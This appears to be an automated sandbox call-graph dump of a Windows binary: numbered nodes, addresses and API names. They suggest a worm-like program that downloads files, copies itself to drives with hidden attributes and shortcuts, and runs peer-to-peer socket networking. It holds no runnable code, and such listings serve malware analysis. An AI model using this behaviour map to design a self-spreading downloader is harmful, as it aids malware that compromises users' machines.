lstrcmpiW 5231->5233 5232->5225 5234 40ec93 SysFreeString 5233->5234 5235 40ec26 5233->5235 5234->5232 5236 40e990 2 API calls 5235->5236 5238 40ec34 5236->5238 5237 40ec85 5237->5234 5238->5234 5238->5237 5239 40ec63 lstrcmpiW 5238->5239 5240 40ec75 5239->5240 5241 40ec7b SysFreeString 5239->5241 5240->5241 5241->5237 5246 40d3ed 5242->5246 5243 40d390 _vscprintf wvsprintfA 5243->5246 5244 40d408 SysFreeString 5244->5098 5245 40a990 9 API calls 5245->5246 5246->5243 5246->5244 5246->5245 5248 40b409 gethostbyname 5247->5248 5249 40b41c socket 5247->5249 5248->5249 5249->5104 5249->5108 5250->5108 5251->5111 5253 40ef47 5252->5253 5254 40f014 InternetConnectA 5252->5254 5253->5116 5253->5119 5255 40f194 InternetCloseHandle 5254->5255 5256 40f04d HttpOpenRequestA 5254->5256 5255->5253 5257 40f083 HttpAddRequestHeadersA HttpSendRequestA 5256->5257 5258 40f187 InternetCloseHandle 5256->5258 5259 40f17a InternetCloseHandle 5257->5259 5262 40f0cd 5257->5262 5258->5255 5259->5258 5260 40f0e4 InternetReadFile 5261 40f111 5260->5261 5260->5262 5261->5259 5262->5260 5262->5261 5263 40a990 9 API calls 5262->5263 5264 40f12c memcpy 5263->5264 5264->5262 5271 407417 5265->5271 5266 407670 CoCreateInstance 5266->5271 5267 4075eb 5269 4075f4 SysFreeString 5267->5269 5270 4073bb SysFreeString 5267->5270 5268 40ab60 _invalid_parameter 3 API calls 5268->5267 5269->5270 5270->4573 5271->5266 5272 407566 SysAllocString 5271->5272 5273 407432 5271->5273 5272->5271 5272->5273 5273->5267 5273->5268 5275 40c87a 5274->5275 5276 40c87e 5274->5276 5275->4579 5278 40c830 CryptAcquireContextW 5276->5278 5279 40c86b 5278->5279 5280 40c84d CryptGenRandom CryptReleaseContext 5278->5280 5279->5275 5280->5279 5281->4597 5333 40b780 gethostname 5282->5333 5285 40b869 5285->4597 5287 40b87c strcmp 5287->5285 5288 40b891 5287->5288 5337 40b3d0 inet_ntoa 5288->5337 5290 40b89f strstr 5291 40b8f0 5290->5291 5292 40b8af 5290->5292 5340 40b3d0 inet_ntoa 5291->5340 5338 40b3d0 inet_ntoa 5292->5338 5295 40b8bd strstr 5295->5285 5297 40b8cd 5295->5297 5296 40b8fe strstr 5298 40b90e 5296->5298 5299 40b94f 5296->5299 5339 40b3d0 inet_ntoa 5297->5339 5341 40b3d0 inet_ntoa 5298->5341 5343 40b3d0 inet_ntoa 5299->5343 5303 40b95d strstr 5306 40b96d 5303->5306 5307 40b9ae EnterCriticalSection 5303->5307 5304 40b8db strstr 5304->5285 5304->5291 5305 40b91c strstr 5305->5285 5308 40b92c 5305->5308 5344 40b3d0 inet_ntoa 5306->5344 5311 40b9c6 5307->5311 5342 40b3d0 inet_ntoa 5308->5342 5318 40b9f1 5311->5318 5346 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5311->5346 5312 40b93a strstr 5312->5285 5312->5299 5313 40b97b strstr 5313->5285 5314 40b98b 5313->5314 5345 40b3d0 inet_ntoa 5314->5345 5317 40baea LeaveCriticalSection 5317->5285 5318->5317 5320 40a740 7 API calls 5318->5320 5319 40b999 strstr 5319->5285 5319->5307 5321 40ba35 5320->5321 5321->5317 5347 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5321->5347 5323 40ba53 5324 40ba80 5323->5324 5325 40ba76 Sleep 5323->5325 5327 40baa5 5323->5327 5326 40ab60 _invalid_parameter 3 API calls 5324->5326 5325->5323 5326->5327 5327->5317 5348 40b530 5327->5348 5329->4605 5331 40b530 13 API calls 5330->5331 5332 40b523 LeaveCriticalSection 5331->5332 5332->4599 5334 40b7a7 gethostbyname 5333->5334 5335 40b7c3 5333->5335 5334->5335 5335->5285 5336 40b3d0 inet_ntoa 5335->5336 5336->5287 5337->5290 5338->5295 5339->5304 5340->5296 5341->5305 5342->5312 5343->5303 5344->5313 5345->5319 5346->5318 5347->5323 5349 40b544 5348->5349 5350 40b53f 5348->5350 5351 40a950 __aligned_recalloc_base 7 API calls 5349->5351 5350->5317 5353 40b558 5351->5353 5352 40b5b4 CreateFileW 5354 40b603 InterlockedExchange 5352->5354 5355 40b5d7 WriteFile FlushFileBuffers 5352->5355 5353->5350 5353->5352 5356 40ab60 _invalid_parameter 3 API calls 5354->5356 5355->5354 5356->5350 5360 40dcdd 5357->5360 5358 40dc13 5358->4612 5358->4613 5359 40dd01 WaitForSingleObject 5359->5360 5360->5358 5360->5359 5366 407840 5361->5366 5362 407868 Sleep 5362->5366 5363 40791a Sleep 5363->5366 5364 407897 Sleep wsprintfA DeleteUrlCacheEntry 5391 40f4b0 InternetOpenA 5364->5391 5366->5362 5366->5363 5366->5364 5367 40f560 58 API calls 5366->5367 5367->5366 5369 4058c9 memset GetModuleHandleW 5368->5369 5370 405902 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5369->5370 5370->5370 5371 405940 CreateWindowExW 5370->5371 5372 40596b 5371->5372 5373 40596d GetMessageA 5371->5373 5374 40599f ExitThread 5372->5374 5375 405981 TranslateMessage DispatchMessageA 5373->5375 5376 405997 5373->5376 5375->5373 5376->5369 5376->5374 5398 40f1f0 CreateFileW 5377->5398 5379 4070f8 ExitThread 5381 406fa0 5381->5379 5382 4070e8 Sleep 5381->5382 5383 406fd9 5381->5383 5401 4063e0 GetLogicalDrives 5381->5401 5382->5381 5407 406300 5383->5407 5385 407010 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5388 407086 wsprintfW 5385->5388 5389 40709b wsprintfW 5385->5389 5387 40700b 5388->5389 5413 4068e0 _chkstk 5389->5413 5392 40f4d6 InternetOpenUrlA 5391->5392 5393 40f548 Sleep 5391->5393 5394 40f4f5 HttpQueryInfoA 5392->5394 5395 40f53e InternetCloseHandle 5392->5395 5393->5366 5396 40f534 InternetCloseHandle 5394->5396 5397 40f51e 5394->5397 5395->5393 5396->5395 5397->5396 5399 40f238 5398->5399 5400 40f21f GetFileSize 5398->5400 5399->5381 5400->5399 5406 40640d 5401->5406 5402 406486 5402->5381 5403 40641c RegOpenKeyExW 5404 40643e RegQueryValueExW 5403->5404 5403->5406 5405 40647a RegCloseKey 5404->5405 5404->5406 5405->5406 5406->5402 5406->5403 5406->5405 5408 406359 5407->5408 5409 40631c 5407->5409 5408->5385 5408->5387 5472 406360 GetDriveTypeW 5409->5472 5412 40634b lstrcpyW 5412->5408 5414 4068fe 7 API calls 5413->5414 5443 4068f7 5413->5443 5415 4069d2 5414->5415 5416 406a14 PathFileExistsW 5414->5416 5417 40f1f0 2 API calls 5415->5417 5418 406ac4 5416->5418 5419 406a29 PathFileExistsW 5416->5419 5421 4069de 5417->5421 5420 406af5 PathFileExistsW 5418->5420 5477 4064a0 7 API calls 5418->5477 5422 406a59 PathFileExistsW 5419->5422 5423 406a3a SetFileAttributesW DeleteFileW 5419->5423 5426 406b06 5420->5426 5427 406b47 PathFileExistsW 5420->5427 5421->5416 5425 4069f5 SetFileAttributesW DeleteFileW 5421->5425 5428 406a6a CreateDirectoryW 5422->5428 5429 406a8c PathFileExistsW 5422->5429 5423->5422 5425->5416 5430 40f1f0 2 API calls 5426->5430 5432 406b58 5427->5432 5433 406bca PathFileExistsW 5427->5433 5428->5429 5431 406a7d SetFileAttributesW 5428->5431 5429->5418 5434 406a9d CopyFileW 5429->5434 5438 406b12 5430->5438 5431->5429 5432->5433 5439 406b64 PathFileExistsW 5432->5439 5435 406c75 FindFirstFileW 5433->5435 5436 406bdf PathFileExistsW 5433->5436 5434->5418 5440 406ab5 SetFileAttributesW 5434->5440 5435->5443 5469 406c9c 5435->5469 5441 406bf0 5436->5441 5442 406c2c 5436->5442 5437 406ad4 5437->5420 5444 40f1f0 2 API calls 5437->5444 5438->5427 5445 406b28 SetFileAttributesW DeleteFileW 5438->5445 5439->5433 5446 406b73 CopyFileW 5439->5446 5440->5418 5448 406c12 5441->5448 5449 406bf8 5441->5449 5452 406c34 5442->5452 5453 406c4e 5442->5453 5443->5387 5451 406aed 5444->5451 5445->5427 5446->5433 5447 406b8b SetFileAttributesW PathFileExistsW 5446->5447 5447->5433 5454 406bab SetFileAttributesW DeleteFileW 5447->5454 5458 406660 4 API calls 5448->5458 5488 406660 CoInitialize CoCreateInstance 5449->5488 5450 406d5e lstrcmpW 5457 406d74 lstrcmpW 5450->5457 5450->5469 5451->5420 5459 406660 4 API calls 5452->5459 5455 406660 4 API calls 5453->5455 5454->5433 5460 406c0d SetFileAttributesW 5455->5460 5457->5469 5458->5460 5459->5460 5460->5435 5461 406f35 FindNextFileW 5461->5450 5463 406f51 FindClose 5461->5463 5463->5443 5464 406dba lstrcmpiW 5464->5469 5465 406e21 PathMatchSpecW 5466 406e42 wsprintfW SetFileAttributesW DeleteFileW 5465->5466 5465->5469 5466->5469 5467 406e9f PathFileExistsW 5468 406eb5 wsprintfW wsprintfW 5467->5468 5467->5469 5468->5469 5470 406f1f MoveFileExW 5468->5470 5469->5450 5469->5461 5469->5464 5469->5465 5469->5467 5493 4067a0 CreateDirectoryW wsprintfW FindFirstFileW 5469->5493 5470->5461 5473 406388 5472->5473 5475 40633f 5472->5475 5474 40639c QueryDosDeviceW 5473->5474 5473->5475 5474->5475 5476 4063b6 StrCmpNW 5474->5476 5475->5408 5475->5412 5476->5475 5478 406640 InternetCloseHandle 5477->5478 5479 40653e InternetOpenUrlW 5477->5479 5478->5437 5480 406633 InternetCloseHandle 5479->5480 5481 40656b CreateFileW 5479->5481 5480->5478 5482 406626 5481->5482 5483 406598 InternetReadFile 5481->5483 5482->5480 5484 4065eb wsprintfW DeleteFileW 5483->5484 5485 4065bc 5483->5485 5484->5482 5485->5484 5486 4065c5 WriteFile 5485->5486 5486->5483 5489 406696 5488->5489 5492 4066ee 5488->5492 5490 4066a9 wsprintfW 5489->5490 5491 4066cf wsprintfW 5489->5491 5489->5492 5490->5492 5491->5492 5492->5460 5494 4067f5 lstrcmpW 5493->5494 5495 4068cf 5493->5495 5496 40680b lstrcmpW 5494->5496 5500 406821 5494->5500 5495->5469 5498 406823 wsprintfW wsprintfW 5496->5498 5496->5500 5497 40689c FindNextFileW 5497->5494 5501 4068b8 FindClose RemoveDirectoryW 5497->5501 5499 406886 MoveFileExW 5498->5499 5498->5500 5499->5497 5500->5497 5501->5495 5869 40d980 5875 4021b0 5869->5875 5872 40d9bf 5873 40d9a5 WaitForSingleObject 5879 401600 5873->5879 5876 4021cf 5875->5876 5877 4021bb 5875->5877 5876->5872 5876->5873 5877->5876 5900 402020 5877->5900 5880 401737 5879->5880 5881 40160d 5879->5881 5880->5872 5881->5880 5882 401619 EnterCriticalSection 5881->5882 5883 401630 5882->5883 5884 4016b5 LeaveCriticalSection SetEvent 5882->5884 5883->5884 5887 401641 InterlockedDecrement 5883->5887 5890 40165a InterlockedExchangeAdd 5883->5890 5898 4016a0 InterlockedDecrement 5883->5898 5885 4016d0 5884->5885 5886 4016e8 5884->5886 5888 4016d6 PostQueuedCompletionStatus 5885->5888 5889 40dd50 11 API calls 5886->5889 5887->5883 5888->5886 5888->5888 5891 4016f3 5889->5891 5890->5883 5892 40166d InterlockedIncrement 5890->5892 5893 40de90 6 API calls 5891->5893 5894 401c50 4 API calls 5892->5894 5895 4016fc CloseHandle CloseHandle WSACloseEvent 5893->5895 5894->5883 5921 40b4f0 shutdown closesocket 5895->5921 5897 401724 DeleteCriticalSection 5899 40ab60 _invalid_parameter 3 API calls 5897->5899 5898->5883 5899->5880 5901 40a740 7 API calls 5900->5901 5902 40202b 5901->5902 5903 402038 GetSystemInfo InitializeCriticalSection CreateEventA 5902->5903 5909 4021a5 5902->5909 5904 402076 CreateIoCompletionPort 5903->5904 5905 40219f 5903->5905 5904->5905 5906 40208f 5904->5906 5907 401600 35 API calls 5905->5907 5908 40dbb0 8 API calls 5906->5908 5907->5909 5910 402094 5908->5910 5909->5876 5910->5905 5911 40209f WSASocketA 5910->5911 5911->5905 5912 4020bd setsockopt htons bind 5911->5912 5912->5905 5913 402126 listen 5912->5913 5913->5905 5914 40213a WSACreateEvent 5913->5914 5914->5905 5915 402147 WSAEventSelect 5914->5915 5915->5905 5920 402159 5915->5920 5916 40217f 5917 40dbe0 16 API calls 5916->5917 5919 402194 5917->5919 5918 40dbe0 16 API calls 5918->5920 5919->5876 5920->5916 5920->5918 5921->5897 5934 406085 5936 405ffe 5934->5936 5935 40608a LeaveCriticalSection 5936->5935 5937 40abd0 8 API calls 5936->5937 5938 40605c 5937->5938 5938->5935 5502 406fc6 5505 406fa8 5502->5505 5503 4070e8 Sleep 5503->5505 5504 406fd9 5506 406300 4 API calls 5504->5506 5505->5503 5505->5504 5507 4070f8 ExitThread 5505->5507 5510 4063e0 4 API calls 5505->5510 5508 406fea 5506->5508 5509 407010 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5508->5509 5511 40700b 5508->5511 5512 407086 wsprintfW 5509->5512 5513 40709b wsprintfW 5509->5513 5510->5505 5512->5513 5514 4068e0 79 API calls 5513->5514 5514->5511 5939 40f908 5940 40f910 5939->5940 5942 40f9c4 5940->5942 5945 40fb45 5940->5945 5944 40f949 5944->5942 5949 40fa30 RtlUnwind 5944->5949 5946 40fb5a 5945->5946 5948 40fb76 5945->5948 5947 40fbe5 NtQueryVirtualMemory 5946->5947 5946->5948 5947->5948 5948->5944 5950 40fa48 5949->5950 5950->5944 5515 40df50 5518 40bf20 5515->5518 5529 40bf31 5518->5529 5521 40ab60 _invalid_parameter 3 API calls 5522 40c2ff 5521->5522 5523 40c310 21 API calls 5523->5529 5525 40b830 31 API calls 5525->5529 5526 40bf4f 5526->5521 5528 40bed0 13 API calls 5528->5529 5529->5523 5529->5525 5529->5526 5529->5528 5532 40c460 5529->5532 5539 40bc00 EnterCriticalSection 5529->5539 5544 407240 5529->5544 5549 4072e0 5529->5549 5554 407110 5529->5554 5561 407210 5529->5561 5533 40c471 lstrlenA 5532->5533 5534 40cb40 7 API calls 5533->5534 5535 40c48f 5534->5535 5535->5533 5537 40c49b 5535->5537 5536 40ab60 _invalid_parameter 3 API calls 5538 40c51f 5536->5538 5537->5536 5537->5538 5538->5529 5540 40bc18 5539->5540 5541 40bc54 LeaveCriticalSection 5540->5541 5564 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5540->5564 5541->5529 5543 40bc43 5543->5541 5565 407280 5544->5565 5546 407279 5546->5529 5548 40dbe0 16 API calls 5548->5546 5550 407280 75 API calls 5549->5550 5551 4072ff 5550->5551 5552 40732c 5551->5552 5580 407340 5551->5580 5552->5529 5591 405fe0 EnterCriticalSection 5554->5591 5556 40712a 5560 40715d 5556->5560 5596 407170 5556->5596 5559 40ab60 _invalid_parameter 3 API calls 5559->5560 5560->5529 5603 4060a0 EnterCriticalSection 5561->5603 5563 407232 5563->5529 5564->5543 5568 407293 5565->5568 5566 407254 5566->5546 5566->5548 5568->5566 5569 405ef0 EnterCriticalSection 5568->5569 5570 40d1d0 71 API calls 5569->5570 5571 405f0e 5570->5571 5572 405fcb LeaveCriticalSection 5571->5572 5573 405f27 5571->5573 5577 405f48 5571->5577 5572->5568 5574 405f31 memcpy 5573->5574 5575 405f46 5573->5575 5574->5575 5576 40ab60 _invalid_parameter 3 API calls 5575->5576 5578 405fc8 5576->5578 5577->5575 5579 405fa6 memcpy 5577->5579 5578->5572 5579->5575 5583 40be30 5580->5583 5584 40c8b0 3 API calls 5583->5584 5585 40be3b 5584->5585 5586 40be57 lstrlenA 5585->5586 5587 40cb40 7 API calls 5586->5587 5588 40be8d 5587->5588 5589 407385 5588->5589 5590 40ab60 _invalid_parameter 3 API calls 5588->5590 5589->5552 5590->5589 5593 405ffe 5591->5593 5592 40608a LeaveCriticalSection 5592->5556 5593->5592 5594 40abd0 8 API calls 5593->5594 5595 40605c 5594->5595 5595->5592 5597 40a950 __aligned_recalloc_base 7 API calls 5596->5597 5598 407182 memcpy 5597->5598 5599 40be30 13 API calls 5598->5599 5600 4071ec 5599->5600 5601 40ab60 _invalid_parameter 3 API calls 5600->5601 5602 407151 5601->5602 5602->5559 5628 40d230 5603->5628 5606 4062e3 LeaveCriticalSection 5606->5563 5607 40d1d0 71 API calls 5608 4060d9 5607->5608 5608->5606 5609 4061f8 5608->5609 5611 406134 memcpy 5608->5611 5610 406221 5609->5610 5612 405d30 70 API calls 5609->5612 5613 40ab60 _invalid_parameter 3 API calls 5610->5613 5614 40ab60 _invalid_parameter 3 API calls 5611->5614 5612->5610 5615 406242 5613->5615 5616 406158 5614->5616 5615->5606 5617 406251 CreateFileW 5615->5617 5618 40abd0 8 API calls 5616->5618 5617->5606 5619 406274 5617->5619 5620 406168 5618->5620 5623 406291 WriteFile 5619->5623 5624 4062cf FlushFileBuffers 5619->5624 5621 40ab60 _invalid_parameter 3 API calls 5620->5621 5622 40618f 5621->5622 5625 40cb40 7 API calls 5622->5625 5623->5619 5624->5606 5626 4061c5 5625->5626 5627 4076c0 66 API calls 5626->5627 5627->5609 5631 40c780 5628->5631 5632 40c791 5631->5632 5633 40abd0 8 API calls 5632->5633 5634 40c7ab 5632->5634 5635 40c6e0 70 API calls 5632->5635 5638 4084a0 68 API calls 5632->5638 5639 40c7eb memcmp 5632->5639 5633->5632 5636 40ab60 _invalid_parameter 3 API calls 5634->5636 5635->5632 5637 4060c2 5636->5637 5637->5606 5637->5607 5638->5632 5639->5632 5639->5634 5640 401f50 GetQueuedCompletionStatus 5641 402008 5640->5641 5642 401f92 5640->5642 5643 401f97 WSAGetOverlappedResult 5642->5643 5647 401d60 5642->5647 5643->5642 5644 401fb9 WSAGetLastError 5643->5644 5644->5642 5646 401fd3 GetQueuedCompletionStatus 5646->5641 5646->5642 5648 401ef2 InterlockedDecrement setsockopt closesocket 5647->5648 5649 401d74 5647->5649 5650 401e39 5648->5650 5649->5648 5651 401d7c 5649->5651 5650->5646 5667 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5651->5667 5653 401d81 InterlockedExchange 5654 401d98 5653->5654 5655 401e4e 5653->5655 5654->5650 5658 401da9 InterlockedDecrement 5654->5658 5659 401dbc InterlockedDecrement InterlockedExchangeAdd 5654->5659 5656 401e67 5655->5656 5657 401e57 InterlockedDecrement 5655->5657 5660 401e72 5656->5660 5661 401e87 InterlockedDecrement 5656->5661 5657->5646 5658->5646 5663 401e2f 5659->5663 5676 401ae0 WSASend 5660->5676 5662 401ee9 5661->5662 5662->5646 5668 401cf0 5663->5668 5665 401e7e 5665->5646 5667->5653 5669 401d00 InterlockedExchangeAdd 5668->5669 5670 401cfc 5668->5670 5671 401d53 5669->5671 5672 401d17 InterlockedIncrement 5669->5672 5670->5650 5671->5650 5682 401c50 WSARecv 5672->5682 5674 401d46 5674->5671 5675 401d4c InterlockedDecrement 5674->5675 5675->5671 5677 401b50 5676->5677 5678 401b12 WSAGetLastError 5676->5678 5677->5665 5678->5677 5679 401b1f 5678->5679 5680 401b56 5679->5680 5681 401b26 Sleep WSASend 5679->5681 5680->5665 5681->5677 5681->5678 5683 401cd2 5682->5683 5684 401c8e 5682->5684 5683->5674 5685 401c90 WSAGetLastError 5684->5685 5686 401ca4 Sleep WSARecv 5684->5686 5687 401cdb 5684->5687 5685->5683 5685->5684 5686->5683 5686->5685 5687->5674 5688 40db50 5693 401b60 5688->5693 5690 40db65 5691 40db84 5690->5691 5692 401b60 16 API calls 5690->5692 5692->5691 5694 401b70 5693->5694 5712 401c42 5693->5712 5695 40a740 7 API calls 5694->5695 5694->5712 5696 401b9d 5695->5696 5697 40abd0 8 API calls 5696->5697 5696->5712 5698 401bc9 5697->5698 5699 401be6 5698->5699 5700 401bd6 5698->5700 5701 401ae0 4 API calls 5699->5701 5702 40ab60 _invalid_parameter 3 API calls 5700->5702 5703 401bf3 5701->5703 5704 401bdc 5702->5704 5705 401c33 5703->5705 5706 401bfc EnterCriticalSection 5703->5706 5704->5690 5709 40ab60 _invalid_parameter 3 API calls 5705->5709 5707 401c13 5706->5707 5708 401c1f LeaveCriticalSection 5706->5708 5707->5708 5708->5690 5710 401c3c 5709->5710 5711 40ab60 _invalid_parameter 3 API calls 5710->5711 5711->5712 5712->5690 5713 40bdd0 5714 40bdd3 WaitForSingleObject 5713->5714 5715 40be01 5714->5715 5716 40bdeb InterlockedDecrement 5714->5716 5717 40bdfa 5716->5717 5717->5714 5718 40b510 15 API calls 5717->5718 5718->5717 5719 40dfd0 5729 4013b0 5719->5729 5721 40e05d 5723 40dff7 InterlockedExchangeAdd 5724 40e03b WaitForSingleObject 5723->5724 5725 40dfdd 5723->5725 5724->5725 5726 40e054 5724->5726 5725->5721 5725->5723 5725->5724 5741 40bbb0 EnterCriticalSection 5725->5741 5746 40bed0 5725->5746 5749 401330 5726->5749 5730 40a740 7 API calls 5729->5730 5731 4013bb CreateEventA socket 5730->5731 5732 4013f2 5731->5732 5733 4013f8 5731->5733 5734 401330 7 API calls 5732->5734 5735 401401 bind 5733->5735 5736 401462 5733->5736 5734->5733 5737 401444 CreateThread 5735->5737 5738 401434 5735->5738 5736->5725 5737->5736 5739 401330 7 API calls 5738->5739 5740 40143a 5739->5740 5740->5725 5742 40bbe7 LeaveCriticalSection 5741->5742 5743 40bbcf 5741->5743 5742->5725 5744 40c870 3 API calls 5743->5744 5745 40bbda 5744->5745 5745->5742 5747 40be30 13 API calls 5746->5747 5748 40bf11 5747->5748 5748->5725 5750 401339 5749->5750 5758 40139b 5749->5758 5751 401341 SetEvent WaitForSingleObject 5750->5751 5750->5758 5756 401362 5751->5756 5752 40138b 5759 40b4f0 shutdown closesocket 5752->5759 5754 40ab60 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5754->5756 5755 401395 5757 40ab60 _invalid_parameter 3 API calls 5755->5757 5756->5752 5756->5754 5757->5758 5758->5721 5759->5755 5760 40d9d0 5761 40da3e 5760->5761 5762 40d9e6 5760->5762 5762->5761 5763 40d9f0 5762->5763 5764 40da43 5762->5764 5765 40da93 5762->5765 5768 40a740 7 API calls 5763->5768 5766 40da68 5764->5766 5767 40da5b InterlockedDecrement 5764->5767 5794 40c570 5765->5794 5770 40ab60 _invalid_parameter 3 API calls 5766->5770 5767->5766 5771 40d9fd 5768->5771 5772 40da74 5770->5772 5783 4023d0 5771->5783 5774 40ab60 _invalid_parameter 3 API calls 5772->5774 5774->5761 5777 40dab9 5777->5761 5780 40daf1 IsBadReadPtr 5777->5780 5782 40bf20 186 API calls 5777->5782 5799 40c670 5777->5799 5779 40da2b InterlockedIncrement 5779->5761 5780->5777 5782->5777 5784 402413 5783->5784 5785 4023d9 5783->5785 5787 40b6f0 5784->5787 5785->5784 5786 4023ea InterlockedIncrement 5785->5786 5786->5784 5788 40b780 2 API calls 5787->5788 5789 40b6ff 5788->5789 5790 40b70d EnterCriticalSection 5789->5790 5791 40b709 5789->5791 5792 40b72c LeaveCriticalSection 5790->5792 5791->5761 5791->5779 5792->5791 5795 40c583 5794->5795 5796 40c5ad memcpy 5794->5796 5797 40a990 9 API calls 5795->5797 5796->5777 5798 40c5a4 5797->5798 5798->5796 5800 40c699 5799->5800 5801 40c68e 5799->5801 5800->5801 5802 40c6b1 memmove 5800->5802 5801->5777 5802->5801 5965 40f910 5966 40f92e 5965->5966 5968 40f9c4 5965->5968 5967 40fb45 NtQueryVirtualMemory 5966->5967 5970 40f949 5967->5970 5969 40fa30 RtlUnwind 5969->5970 5970->5968 5970->5969 5971 40d510 5972 40b6f0 4 API calls 5971->5972 5973 40d523 5972->5973 5974 40d53a 5973->5974 5976 40d550 InterlockedExchangeAdd 5973->5976 5977 40d566 5976->5977 5978 40d56d 5976->5978 5977->5974 5993 40d840 5978->5993 5981 40d58d InterlockedIncrement 5990 40d597 5981->5990 5982 40bed0 13 API calls 5982->5990 5983 40d5c0 6000 40b3d0 inet_ntoa 5983->6000 5985 40d5cc 5986 40d690 InterlockedDecrement 5985->5986 6001 40b4f0 shutdown closesocket 5986->6001 5988 40a950 __aligned_recalloc_base 7 API calls 5988->5990 5989 40d770 6 API calls 5989->5990 5990->5982 5990->5983 5990->5986 5990->5988 5990->5989 5991 40bf20 186 API calls 5990->5991 5992 40ab60 _invalid_parameter 3 API calls 5990->5992 5991->5990 5992->5990 5994 40d84d socket 5993->5994 5995 40d862 htons connect 5994->5995 5996 40d8bf 5994->5996 5995->5996 5997 40d8aa 5995->5997 5996->5994 5998 40d57d 5996->5998 6002 40b4f0 shutdown closesocket 5997->6002 5998->5977 5998->5981 6000->5985 6001->5977 6002->5998 6003 401920 GetTickCount WaitForSingleObject 6004 401ac9 6003->6004 6005 40194d WSAWaitForMultipleEvents 6003->6005 6006 4019f0 GetTickCount 6005->6006 6007 40196a WSAEnumNetworkEvents 6005->6007 6008 401a43 GetTickCount 6006->6008 6009 401a05 EnterCriticalSection 6006->6009 6007->6006 6023 401983 6007->6023 6012 401ab5 WaitForSingleObject 6008->6012 6013 401a4e EnterCriticalSection 6008->6013 6010 401a16 6009->6010 6011 401a3a LeaveCriticalSection 6009->6011 6017 401a29 LeaveCriticalSection 6010->6017 6045 401820 6010->6045 6011->6012 6012->6004 6012->6005 6015 401aa1 LeaveCriticalSection GetTickCount 6013->6015 6016 401a5f InterlockedExchangeAdd 6013->6016 6014 401992 accept 6014->6006 6014->6023 6015->6012 6063 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 6016->6063 6017->6012 6021 401a72 6021->6015 6021->6016 6064 40b4f0 shutdown closesocket 6021->6064 6023->6006 6023->6014 6024 401cf0 7 API calls 6023->6024 6025 4022c0 6023->6025 6024->6006 6026 4022d2 EnterCriticalSection 6025->6026 6027 4022cd 6025->6027 6028 4022e7 6026->6028 6029 4022fd LeaveCriticalSection 6026->6029 6027->6023 6028->6029 6030 402308 6029->6030 6031 40230f 6029->6031 6030->6023 6032 40a740 7 API calls 6031->6032 6033 402319 6032->6033 6034 402326 getpeername CreateIoCompletionPort 6033->6034 6035 4023b8 6033->6035 6037 4023b2 6034->6037 6038 402366 6034->6038 6067 40b4f0 shutdown closesocket 6035->6067 6039 40ab60 _invalid_parameter 3 API calls 6037->6039 6065 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 6038->6065 6039->6035 6040 4023c3 6040->6023 6042 40236b InterlockedExchange InitializeCriticalSection InterlockedIncrement 6066 4021e0 EnterCriticalSection LeaveCriticalSection 6042->6066 6044 4023ab 6044->6023 6046 40190f 6045->6046 6047 401830 6045->6047 6046->6011 6047->6046 6048 40183d InterlockedExchangeAdd 6047->6048 6048->6046 6054 401854 6048->6054 6049 401880 6050 401891 6049->6050 6077 40b4f0 shutdown closesocket 6049->6077 6052 4018a7 InterlockedDecrement 6050->6052 6055 401901 6050->6055 6052->6055 6054->6046 6054->6049 6068 4017a0 EnterCriticalSection 6054->6068 6056 402247 6055->6056 6057 402265 EnterCriticalSection 6055->6057 6056->6011 6058 40229c LeaveCriticalSection DeleteCriticalSection 6057->6058 6061 40227d 6057->6061 6059 40ab60 _invalid_parameter 3 API calls 6058->6059 6059->6056 6060 40ab60 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 6060->6061 6061->6060 6062 40229b 6061->6062 6062->6058 6063->6021 6064->6021 6065->6042 6066->6044 6067->6040 6069 401807 LeaveCriticalSection 6068->6069 6070 4017ba InterlockedExchangeAdd 6068->6070 6069->6054 6071 4017ca LeaveCriticalSection 6070->6071 6072 4017d9 6070->6072 6071->6054 6073 40ab60 _invalid_parameter 3 API calls 6072->6073 6074 4017fe 6073->6074 6075 40ab60 _invalid_parameter 3 API calls 6074->6075 6076 401804 6075->6076 6076->6069 6077->6050 6078 40dfa0 6081 401200 6078->6081 6080 40dfc2 6082 40121d 6081->6082 6096 401314 6081->6096 6083 40a950 __aligned_recalloc_base 7 API calls 6082->6083 6082->6096 6084 401247 memcpy htons 6083->6084 6085 4012ed 6084->6085 6086 401297 sendto 6084->6086 6089 40ab60 _invalid_parameter 3 API calls 6085->6089 6087 4012b6 InterlockedExchangeAdd 6086->6087 6088 4012e9 6086->6088 6087->6086 6090 4012cc 6087->6090 6088->6085 6091 40130a 6088->6091 6092 4012fc 6089->6092 6093 40ab60 _invalid_parameter 3 API calls 6090->6093 6094 40ab60 _invalid_parameter 3 API calls 6091->6094 6092->6080 6095 4012db 6093->6095 6094->6096 6095->6080 6096->6080 6097 40eba1 6098 40ebaa 6097->6098 6099 40ec9d 6098->6099 6100 40ec13 lstrcmpiW 6098->6100 6101 40ec93 SysFreeString 6100->6101 6102 40ec26 6100->6102 6101->6099 6103 40e990 2 API calls 6102->6103 6105 40ec34 6103->6105 6104 40ec85 6104->6101 6105->6101 6105->6104 6106 40ec63 lstrcmpiW 6105->6106 6107 40ec75 6106->6107 6108 40ec7b SysFreeString 6106->6108 6107->6108 6108->6104 5803 406de4 5805 406d8a 5803->5805 5804 406dba lstrcmpiW 5804->5805 5805->5804 5806 406f35 FindNextFileW 5805->5806 5809 406e21 PathMatchSpecW 5805->5809 5812 406e9f PathFileExistsW 5805->5812 5816 4067a0 11 API calls 5805->5816 5807 406f51 FindClose 5806->5807 5808 406d5e lstrcmpW 5806->5808 5813 406f5e 5807->5813 5808->5805 5811 406d74 lstrcmpW 5808->5811 5809->5805 5810 406e42 wsprintfW SetFileAttributesW DeleteFileW 5809->5810 5810->5805 5811->5805 5812->5805 5814 406eb5 wsprintfW wsprintfW 5812->5814 5814->5805 5815 406f1f MoveFileExW 5814->5815 5815->5806 5816->5805 6109 40792a ExitThread 5817 40e070 5823 401470 5817->5823 5819 40e084 5820 40e0af 5819->5820 5821 40e095 WaitForSingleObject 5819->5821 5822 401330 7 API calls 5821->5822 5822->5820 5824 401483 5823->5824 5825 401572 